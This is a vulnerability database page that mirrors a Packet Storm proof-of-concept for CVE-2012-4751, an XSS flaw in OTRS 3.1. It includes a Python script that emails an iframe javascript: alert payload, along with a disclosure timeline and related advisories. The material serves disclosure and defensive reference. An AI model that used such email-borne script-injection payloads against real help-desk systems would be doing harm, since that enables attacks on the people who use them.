Vulners
Lucene search
OTRS 3.1 Cross Site Scripting
šļøĀ 18 Oct 2012Ā 00:00:00Reported byĀ Mike EduardTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 36Ā Views
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | otrs -- XSS vulnerability | 16 Oct 201200:00 | ā | freebsd |
| otrs -- XSS vulnerability could lead to remote code execution | 16 Oct 201200:00 | ā | freebsd |
 | CVE-2012-4751 | 18 Oct 201200:00 | ā | circl |
 | CVE-2012-4751 | 22 Oct 201216:00 | ā | cve |
 | CVE-2012-4751 | 22 Oct 201216:00 | ā | cvelist |
 | [SECURITY] [DSA 2733-1] otrs2 security update | 2 Aug 201320:25 | ā | debian |
| [SECURITY] [DSA 2733-1] otrs2 security update | 2 Aug 201320:25 | ā | debian |
 | CVE-2012-4751 | 22 Oct 201216:00 | ā | debiancve |
 | Debian DSA-2733-1 : otrs2 - SQL injection | 5 Aug 201300:00 | ā | nessus |
| FreeBSD : otrs -- XSS vulnerability (13320091-52a6-11e2-a289-1c4bd681f0cf) | 2 Jan 201300:00 | ā | nessus |
10
`#!/usr/bin/python
'''
Author: Mike Eduard - Znuny - Enterprise Services for OTRS
Product: OTRS Open Technology Real Services
Version: 3.1.8, 3.1.9 and 3.1.10
Vendor Homepage: http://otrs.org
CVE: 2012-4751
Timeline:
03 Sep 2012: Vulnerability reported + fix to vendor
04 Sep 2012: Vulnerability reported to CERT
05 Sep 2012: Response received from CERT
28 Sep 2012: Update from vendor to have it fixed and released on 16 Oct 2012
16 Oct 2012: Update: vulnerability patched
http://www.kb.cert.org/vuls/id/603276
http://znuny.com/#!/advisory/ZSA-2012-03
http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-03/
17 Oct 2012: Public Disclosure
Installed On: Windows Server 2008 R2 & Open SUSE 12.1
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Firefox 14+16 & Opera 12.01
Injection Point: HTML Email
Injection Payload(s):
1: <iframe src=" javascript:alert('XSS Exploit');"></iframe>
'''
import smtplib, urllib2
payload = """
<iframe src=" javascript:alert('XSS Exploit');"></iframe>
"""
def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: [email protected]\n"
msg += "To: [email protected]\n"
msg += 'Date: Today\r\n'
msg += "Subject: Offensive Security\n"
msg += "Content-type: text/html\n\n"
msg += "XSS" + payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "[email protected]"
password = "123456"
dstemail = "[email protected]"
frmemail = "[email protected]"
smtpsrv = "127.0.0.1"
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Oct 2012 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.05551